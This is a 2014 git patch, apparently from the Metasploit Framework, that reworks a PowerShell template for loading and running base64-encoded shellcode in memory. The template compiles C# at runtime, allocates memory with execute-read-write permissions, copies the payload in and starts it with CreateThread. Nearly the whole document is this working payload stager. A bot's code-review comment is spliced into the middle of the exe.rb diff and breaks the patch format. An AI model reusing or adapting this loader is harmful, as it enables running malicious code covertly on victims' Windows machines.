From 1f9b452425840018d9f23488b833e8a3d793c844 Mon Sep 17 00:00:00 2001
From: Meatballs
Date: Sun, 9 Feb 2014 11:23:39 +0000
Subject: [PATCH] Dont tidy up template yet

---
 .../scripts/to_mem_dotnet.ps1.template | 48 +++++++++++--------
 lib/msf/util/exe.rb | 3 +-
 2 files changed, 29 insertions(+), 22 deletions(-)

diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template
index 236de4564e..3641ac94ef 100644
--- a/data/templates/scripts/to_mem_dotnet.ps1.template
+++ b/data/templates/scripts/to_mem_dotnet.ps1.template
@@ -1,24 +1,30 @@
 Set-StrictMode -Version 2
 $%{var_syscode} = @"
-using System;
-using System.Runtime.InteropServices;
-namespace %{var_kernel32} {
-public class func {
-[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);
-[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j);
-[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l);
-}
-}
+ using System;
+ using System.Runtime.InteropServices;
+ namespace %{var_kernel32} {
+ public class func {
+ [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+ [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+ [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+ [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+ [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+ [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+ }
+ }
 "@
-$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider
-$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters
-$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
-$%{var_compileParams}.GenerateInMemory=$True
-$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode})
-[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}")
-$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40)
-if([Bool]!$%{var_baseaddr}){$global:result=3;return}
-[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length)
-[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
-if([Bool]!$%{var_threadHandle}){$global:result=7;return}
-[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF)
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index f56945c408..cdf83fb26a 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -884,7 +884,7 @@ def self.to_vba(framework,code,opts={})
 hash_sub = rig.to_h
 hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray])
-
+
 return read_replace_script_template("to_mem.aspx.template", hash_sub)
 end
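Review bot: `[Flags]` on the new `Time` enum (`+ [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }`) is misleading, since `Infinite` is a single sentinel value rather than a set of combinable bits; `public enum Time : uint { Infinite = 0xFFFFFFFF }` without the attribute says what is meant. The `$%{var_temp}` assignment on the hunk's last line exists only to discard the return value of `WaitForSingleObject`, and it costs a second change in exe.rb (`rig.init_var(:var_temp)`); `[void][%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)` drops it without a new template variable. The three enums carry only the values this template uses, so a one-line comment such as `// subset of the kernel32 constants used below; not the full Win32 sets` would keep a later reader from extending the calls on the assumption they are complete.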
@@ -898,6 +898,7 @@ def self.to_vba(framework,code,opts={})
 rig.init_var(:var_codeProvider)
 rig.init_var(:var_compileParams)
 rig.init_var(:var_syscode)
+ rig.init_var(:var_temp)
 hash_sub = rig.to_h
 hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)